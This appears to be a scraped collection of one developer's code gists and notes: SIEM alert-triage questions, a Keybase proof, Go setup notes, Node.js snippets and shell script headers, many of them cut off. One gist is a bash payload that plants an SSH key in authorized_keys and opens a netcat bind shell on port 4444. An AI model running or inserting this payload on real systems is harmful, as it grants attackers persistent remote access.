jandre

Some sample questions a security team may ask when triaging events that come from a SIEM/Log Management or directly via a H(N)IDS.

Generally, the exact information an analyst may need to triage the alert may vary depending on the type of event and its source.

Alert triage usually happens in the 'event handling' process -> before a 'security incident' is declared and more detailed invevstigation is needed. However, in smaller SOCs with less rigeur, often the process is compressed - e.g., the same person who is triaging -> performs more detailed investigation, forensics, and other processes that is needed to proceed with incident response. Answering some of the question below may fall into these later phases vs being pure 'triage' tasks.

Domain/Hostname information

• What hostname(s) corresponds to the IP addresses (reverse IP lookup)? (e.g., 123.44.5.55 == google.com, or badmailserver.ru?) Do the hostnames appear to be suspicious, or valid business activity?

jandre

Keybase proof

I hereby claim:

• I am jandre on github.
• I am jandre (https://keybase.io/jandre) on keybase.
• I have a public key whose fingerprint is 6DA2 9D93 9AAA CD1E 8939 CBFD 5004 12C5 9B54 59C9

To claim this, I am signing this object:

jandre

build a go lib and binary


  1. installing go
    1. OS X: brew install go
    2. Linux: https://github.com/dcoxall/vagrant-golang ?
  3. organizing your code
    1. GOPATH  export GOPATH=/Users/jandre/godemo
    2. WORKSPACE https://golang.org/doc/code.html

jandre

#!/bin/bash

touch /tmp/exploited
cd ~
mkdir -p .ssh
chmod 755 .ssh
touch .ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC690OnLNFvUsbWvtpXkyyHnCaC6TNpa5bjODqRFjEaXd2s3VuvZOMCPGuyrHNA891IjisdVIqoOhL7asLnMcTP4cPxbP6JBaKkeNk3M72YBr6+lxQQPUyhDazTezK90JadkZkWwS1oXsrneLFW7rSoQAQGcbze4LIhrC7317+Wcex9ktza9Xvf57WwPkIO1hJcISn6GaaADgpA344/9acipQkZF/HdvmIiNf5nDN/tQTNdh7kSmAWKlr9stVktcBuhs6LaFVwFrsgNp+TXW6BIDfnFnD70EkUmsuA7ZFTMP65qKgGUrZYp4nqvqWtFVubsdjKOBOEGTad6uef+iw+F jandre@gmail.com" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
nc -s 0.0.0.0 -l -p 4444 -e /bin/bash &

jandre

//
// async method passing errors via
// the standard convention of callback(err)
//
> dns.reverse('4.4.4.4', console.log)
{ oncomplete: [Function: onanswer] }
> { [Error: getHostByAddr ENOTFOUND]
  code: 'ENOTFOUND',

jandre

var fork = require('child_process').fork;
var spawn = require('child_process').spawn;
var fs = require('fs');
var path = require('path');

function forkProcess() {
  var fd = fs.openSync('/tmp/sensitive_file', 'w');
  var opts = {
  };
  fork(process.argv[1], ["--forked"], opts)

jandre

One day of Go

One of my ongoing resolutions is to learn a new programming language every year. I've been looking at Go for a while and I thought it would be fun to use the 'holiday' today to really get cranking. I recorded some random impressions as I was chugging along...

When learning a language, I'm one of those people that can't simply read documentation and contrived code examples with any usable level of recall -- I need to internalize it by writing code to solve a legitimate problem. So, I decided to write a little library, a parser for the Linux /proc filesystem. There aren't very many good ones that I've found for Go (and I am thinking of some projects I may want to use it for in the future).

Steps taken:

1. Read a bit of code

jandre

#!/usr/bin/env sh

if ! which md5sum > /dev/null; then
  echo Install md5sum
	exit 1
fi

if ! which curl > /dev/null; then
	echo Install curl
	exit 1

jandre

#!/bin/bash

usage()
{
cat << EOF
usage: $0 options

This script set ownership for all table, sequence and views for a given database

Credit: Based on http://stackoverflow.com/a/2686185/305019 by Alex Soto